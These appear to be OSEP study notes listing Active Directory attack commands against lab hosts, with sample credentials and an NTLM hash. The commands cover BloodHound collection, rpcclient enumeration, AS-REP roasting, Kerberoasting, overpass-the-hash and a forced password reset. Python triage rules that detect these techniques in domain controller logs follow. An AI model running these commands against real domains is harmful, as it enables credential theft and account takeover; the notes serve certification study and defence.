OSEP Notes

Domain Reconnaissance on Kali

BloodHound

proxychains bloodhound-python -c ALL -u kevin -p 'Passw0rd' -d red.com -dc dc.red.com -ns 10.9.20.10 --dns-tcp

or

proxychains bloodhound-python -c ALL -u 'WEB05$@RED.COM' --hashes 00000000000000000000000000000000:d66f37fd3d677522959e5b4aeecafb78 -d COMPLYEDGE.COM -ns 172.16.76.168 --dns-tcp

(machine-account NTLM hash extracted from /etc/krb5cc.keytab; --hashes takes LMHASH:NTHASH, so the LM half can be left as zeros)

SMB Access

smbmap -H 10.9.20.10 -u kevin -p Passw0rd

WinRM Access

crackmapexec winrm 10.9.20.10 -u kevin -p 'Password'

SMB Signing

crackmapexec smb 10.9.20.10

User

  • RPCClient

proxychains rpcclient -U red.com/kevin.gustavo%Passw0rd 10.9.20.10

enumdomusers

queryuser 0x3601

  • Impacket

proxychains python3 GetADUsers.py -all -k -no-pass -dc-ip 10.9.20.10 red.com/Administrator

Group

  • RPCClient

enumdomgroups

querygroup 0x200

AS-REP Roasting

python3 impacket/examples/GetNPUsers.py red.com/ -no-pass -dc-ip 10.9.20.10 -usersfile users.txt -format hashcat

Kerberoasting

python3 impacket/examples/GetUserSPNs.py red.com/kevin:Passw0rd -dc-ip 10.9.20.10 -request

Overpass the Hash / Pass the Key (PTK)

python3 impacket/examples/getTGT.py red.com/kevin:Passw0rd

Reset AD Password

  • RPCClient

setuserinfo2 lawrencecohen 23 'Passw0rd'
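Added example (not part of the original notes): the Kerberos commands above (AS-REP roasting, Kerberoasting, overpass-the-hash) and the rpcclient password reset each leave a characteristic trace in the domain controller's Security log (events 4768, 4769 and 4724). The Python below applies simple triage rules to a set of constructed sample events; field names follow the Windows Security log, but every event and the Kerberoasting threshold are assumptions made for this example.

```python
"""Triage rules for the DC Security events left behind by the techniques above.

Constructed sample events, not real logs. Field names (TargetUserName,
ServiceName, TicketEncryptionType, PreAuthType, IpAddress, SubjectUserName)
follow the Windows Security log for events 4768, 4769 and 4724, but the
events themselves and the threshold are assumptions for this example.
"""
from collections import defaultdict

RC4_HMAC = "0x17"         # TicketEncryptionType for RC4; AES is 0x11 / 0x12
KERBEROAST_MIN_SPNS = 3   # assumed threshold: distinct SPN accounts per source IP

# Constructed sample events: a mix of benign and suspicious activity.
SAMPLE_EVENTS = [
    # benign: AES TGT with pre-authentication
    {"EventID": 4768, "TargetUserName": "kevin", "TicketEncryptionType": "0x12",
     "PreAuthType": "2", "IpAddress": "10.9.20.50"},
    # AS-REP roasting candidate: TGT issued without pre-authentication
    {"EventID": 4768, "TargetUserName": "svc_backup", "TicketEncryptionType": RC4_HMAC,
     "PreAuthType": "0", "IpAddress": "10.9.20.99"},
    # overpass-the-hash candidate: user account, pre-auth used, but RC4 on an AES domain
    {"EventID": 4768, "TargetUserName": "kevin", "TicketEncryptionType": RC4_HMAC,
     "PreAuthType": "2", "IpAddress": "10.9.20.99"},
    # Kerberoasting candidate: RC4 service tickets for several SPN accounts, one source
    {"EventID": 4769, "TargetUserName": "kevin@RED.COM", "ServiceName": "svc_sql",
     "TicketEncryptionType": RC4_HMAC, "IpAddress": "10.9.20.99"},
    {"EventID": 4769, "TargetUserName": "kevin@RED.COM", "ServiceName": "svc_web",
     "TicketEncryptionType": RC4_HMAC, "IpAddress": "10.9.20.99"},
    {"EventID": 4769, "TargetUserName": "kevin@RED.COM", "ServiceName": "svc_iis",
     "TicketEncryptionType": RC4_HMAC, "IpAddress": "10.9.20.99"},
    # benign: AES service ticket for a machine account
    {"EventID": 4769, "TargetUserName": "kevin@RED.COM", "ServiceName": "WEB05$",
     "TicketEncryptionType": "0x12", "IpAddress": "10.9.20.50"},
    # benign: krbtgt service ticket (TGT renewal)
    {"EventID": 4769, "TargetUserName": "kevin@RED.COM", "ServiceName": "krbtgt",
     "TicketEncryptionType": RC4_HMAC, "IpAddress": "10.9.20.50"},
    # administrative password reset of another account (what setuserinfo2 produces)
    {"EventID": 4724, "SubjectUserName": "kevin.gustavo", "TargetUserName": "lawrencecohen"},
]


def asrep_candidates(events):
    """4768 with PreAuthType 0: a TGT issued without pre-authentication,
    which is exactly the condition AS-REP roasting needs."""
    return sorted({(e["TargetUserName"], e["IpAddress"])
                   for e in events
                   if e["EventID"] == 4768 and e.get("PreAuthType") == "0"})


def overpass_candidates(events):
    """4768 for a user (non-$) account that did pre-authenticate but received an
    RC4 ticket. On a domain where AES is the default this is a common indicator
    of a TGT requested with an NT hash instead of a password."""
    return sorted({(e["TargetUserName"], e["IpAddress"])
                   for e in events
                   if e["EventID"] == 4768
                   and e.get("PreAuthType") != "0"
                   and e.get("TicketEncryptionType") == RC4_HMAC
                   and not e["TargetUserName"].endswith("$")})


def kerberoast_candidates(events, min_spns=KERBEROAST_MIN_SPNS):
    """4769 RC4 service tickets for several distinct SPN accounts from one source.
    Machine accounts (ending in $) and krbtgt are excluded as routine traffic."""
    per_source = defaultdict(set)
    for e in events:
        if e["EventID"] != 4769 or e.get("TicketEncryptionType") != RC4_HMAC:
            continue
        svc = e["ServiceName"]
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue
        per_source[e["IpAddress"]].add(svc)
    return {ip: sorted(svcs) for ip, svcs in per_source.items() if len(svcs) >= min_spns}


def password_resets_by_others(events):
    """4724: an account's password was reset by a different principal."""
    return sorted({(e["SubjectUserName"], e["TargetUserName"])
                   for e in events
                   if e["EventID"] == 4724
                   and e["SubjectUserName"].lower() != e["TargetUserName"].lower()})


def triage(events):
    """Run every rule and return the findings keyed by technique."""
    return {
        "asrep_roasting": asrep_candidates(events),
        "overpass_the_hash": overpass_candidates(events),
        "kerberoasting": kerberoast_candidates(events),
        "password_reset_by_other": password_resets_by_others(events),
    }


if __name__ == "__main__":
    for rule, hits in triage(SAMPLE_EVENTS).items():
        print(f"{rule}: {hits}")
```

The RC4 checks only make sense on domains where AES is the configured default; if service accounts legitimately still use RC4, raise the threshold or baseline per source IP first. The 4724 rule is noisy on its own (help desks reset passwords all day) and is best correlated with the Kerberos findings from the same source.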